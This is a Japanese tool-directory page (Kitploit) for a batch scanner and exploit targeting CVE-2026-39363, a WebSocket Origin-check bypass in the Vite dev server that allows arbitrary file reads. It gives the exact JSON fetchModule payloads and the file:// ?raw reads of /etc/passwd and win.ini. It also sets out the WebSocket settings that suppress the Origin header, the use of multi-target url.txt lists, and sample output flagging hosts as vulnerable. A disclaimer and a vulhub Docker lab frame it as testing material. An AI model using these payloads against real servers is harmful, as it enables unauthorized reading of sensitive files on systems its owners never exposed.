Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-39363 — バッチ型脆弱性スキャナ。Vite開発サーバーにおけるCVE-2026-39363を対象とし、WebSocketのオリジン検証バイパスを悪用して、file://プロトコルを介したfetchModule経由で任意のファイルを読み取ります。 | Kitploit
ツール/GitHubGitHub/f4s1on/cve-2026-39363
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubf4s1on/cve-2026-39363

CVE-2026-39363

バッチ型脆弱性スキャナ。Vite開発サーバーにおけるCVE-2026-39363を対象とし、WebSocketのオリジン検証バイパスを悪用して、file://プロトコルを介したfetchModule経由で任意のファイルを読み取ります。

リポジトリを見る
24ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-39363 — Vite Dev Server WebSocket 任意文件读取批量检测

免責事項: 本ツールは認可されたセキュリティテストおよび教育研究のみを目的としています。利用者は現地の法令を遵守する必要があり、許可なく他者のシステムをスキャンまたは攻撃することは違法行為です。作者は不正使用によるいかなる責任も負いません。

脆弱性の説明

Vite 開発サーバー(6.0.0 ~ 6.4.1、7.0.0 ~ 7.3.1、8.0.0 ~ 8.0.4)の HMR WebSocket は Origin ヘッダーを検証していません。攻撃者は vite:invoke イベントを介して fetchModule を呼び出し、file:// プロトコルと ?raw パラメータを組み合わせることで server.fs.allow の制限を回避し、サーバー上の任意のファイルを読み取ることができます。

検出フロー

root@kitploit:~
url.txt → http://host:port
  ↓ host + port を解析
  ↓
┌─ Step 1: ws://host:指定ポート を試行
│  ├─ WebSocket ハンドシェイク成功 + exploit 成功 → 脆弱性あり
│  └─ 失敗 → 指定ポート == 5173 の場合 → 脆弱性なし
│
└─ Step 3: host:5173 をプローブ(指定ポート ≠ 5173 の場合のみ)
   ├─ ポートが閉じている → 脆弱性なし
   └─ ポートが開いている → 5173 で WebSocket ハンドシェイク + exploit
        ├─ 成功 → 脆弱性あり
        └─ 失敗 → 脆弱性なし

使用方法

依存関係のインストール

root@kitploit:~
pip install -r requirements.txt

プロキシの有効化と無効化

プロキシを有効にするには、スクリプトの26〜27行目のコメントを解除します

root@kitploit:~
# プロキシを使用する場合は、以下の2行のコメントを解除し、正しいプロキシアドレスとポートを設定してください
# os.environ["HTTP_PROXY"] = "http://127.0.0.1:8083"
# os.environ["HTTPS_PROXY"] = "http://127.0.0.1:8083"

ターゲットの準備

url.txt にターゲット URL を1行につき1つ記述します:

root@kitploit:~
http://192.168.1.100:5173
http://example.com
http://target.cn:8080

実行

root@kitploit:~
python cve_2026_39363.py

出力

ターミナル:

root@kitploit:~
[*] Loaded 3 URL(s), scanning with 3 thread(s)...

http://192.168.1.100:5173 存在漏洞 (Linux)
http://example.com 存在漏洞 (Linux)
http://target.cn:8080 不存在漏洞

[*] Done. 2/3 vulnerable, elapsed 3.2s
[*] Results saved to result.txt

result.txt:

root@kitploit:~
http://192.168.1.100:5173 (Linux)
http://example.com:5173 (Linux)

各行には POC タイプ(Linux / Windows)が含まれ、正常に読み取られたファイルの特徴が識別されます。

POC 検証ファイル

対象システム読み取りファイル特徴マーカー
Linuxfile:///etc/passwd?rawroot:
Windowsfile:///C:/Windows/win.ini?rawfor 16-bit app support

Exploit Payload

2種類のペイロード形式をサポート(順番に試行):

  1. Vulhub PoC 形式:{"id":"send:0","name":"fetchModule","data":[file_path]}
  2. 内部 RPC 形式:{"fn":"fetchModule","args":[file_path]}

WebSocket の主要パラメータ

パラメータ値理由
サブプロトコルvite-hmrVite HMR WebSocket の要件
Origin送信を抑制 (suppress_origin=True)Vite は Origin ヘッダー付きの非ブラウザ接続を拒否するため

Docker 脆弱性環境テスト

root@kitploit:~
# 起動
docker run -d --name vite-vuln -p 5173:5173 vulhub/vite:7.3.1

# スキャン
echo "http://127.0.0.1:5173" > url.txt
python cve_2026_39363.py

# クリーンアップ
docker stop vite-vuln && docker rm vite-vuln

よくある質問

Q: すべての検出で「脆弱性なし」と返される?

  • ターゲットのポート 5173 が開放されているか確認してください
  • Vite dev server が --host または server.host でネットワークに公開されているか確認してください
  • WebSocket が server.ws: false で無効化されていないか確認してください

Q: Windows で出力が文字化けする?

  • スクリプトは自動処理済みですが、問題が残る場合はターミナルが UTF-8 エンコーディングであることを確認してください

Q: PowerShell で生成した url.txt が解析できない?

  • スクリプトは utf-8-sig を使用して BOM を自動的にスキップします
ツールをダウンロード